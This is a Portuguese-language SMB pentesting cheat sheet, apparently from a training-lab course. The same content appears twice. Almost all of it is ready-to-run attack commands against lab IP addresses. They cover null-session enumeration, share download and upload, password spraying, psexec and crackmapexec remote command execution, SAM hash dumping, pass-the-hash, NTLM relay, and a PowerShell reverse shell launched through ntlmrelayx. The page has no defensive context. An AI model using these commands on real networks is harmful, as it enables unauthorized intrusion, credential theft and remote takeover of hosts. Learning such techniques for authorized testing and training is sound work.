SMB

Server Message Block (SMB) é um protocolo de comunicação criado para fornecer acesso compartilhado a arquivos e impressoras entre nós em uma rede. Inicialmente, ele foi projetado para rodar em cima do NetBIOS sobre TCP/IP (NBT) usando porta TCP 139e portas UDP 137e 138.

Teste de sessão nula no serviço SMB.

smbclient -N -L //10.129.14.128

Enumeração de compartilhamento de rede usando smbmap.

smbmap -H 10.129.14.128

Enumeração de compartilhamento de rede recursiva usando smbmap.

smbmap -H 10.129.14.128 -r notes

Baixe um arquivo específico da pasta compartilhada.

smbmap -H 10.129.14.128 --download "notes\note.txt"

Carregue um arquivo específico para a pasta compartilhada.

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

Sessão nula com o rpcclient.

rpcclient -U'%' 10.10.110.17

Enumeração automatizada do serviço SMB usando enum4linux-ng.

./enum4linux-ng.py 10.10.11.45 -A -C

Pulverização de senhas contra diferentes usuários de uma lista.

crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'

Conecte-se ao serviço SMB usando o impacket-psexec.

impacket-psexec administrator:'Password123!'@10.10.110.17

Execute um comando no serviço SMB usando crackmapexec.

crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

Enumerando usuários conectados.

crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

Extraia hashes do banco de dados SAM.

crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

Use a técnica Pass-The-Hash para autenticar no host de destino.

crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Despeje o banco de dados SAM usando impacket-ntlmrelayx.

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

Execute um shell reverso baseado em PowerShell usando impacket-ntlmrelayx.

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>

PreviousFTP NextQuestions

Last updated 9 months ago

SMB

Teste de sessão nula no serviço SMB.

smbclient -N -L //10.129.14.128

Enumeração de compartilhamento de rede usando smbmap.

smbmap -H 10.129.14.128

Enumeração de compartilhamento de rede recursiva usando smbmap.

smbmap -H 10.129.14.128 -r notes

Baixe um arquivo específico da pasta compartilhada.

smbmap -H 10.129.14.128 --download "notes\note.txt"

Carregue um arquivo específico para a pasta compartilhada.

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

Sessão nula com o rpcclient.

rpcclient -U'%' 10.10.110.17

Enumeração automatizada do serviço SMB usando enum4linux-ng.

./enum4linux-ng.py 10.10.11.45 -A -C

Pulverização de senhas contra diferentes usuários de uma lista.

crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'

Conecte-se ao serviço SMB usando o impacket-psexec.

impacket-psexec administrator:'Password123!'@10.10.110.17

Execute um comando no serviço SMB usando crackmapexec.

crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

Enumerando usuários conectados.

crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

Extraia hashes do banco de dados SAM.

crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

Use a técnica Pass-The-Hash para autenticar no host de destino.

crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Despeje o banco de dados SAM usando impacket-ntlmrelayx.

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

Execute um shell reverso baseado em PowerShell usando impacket-ntlmrelayx.

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>

PreviousFTP NextQuestions

Last updated 9 months ago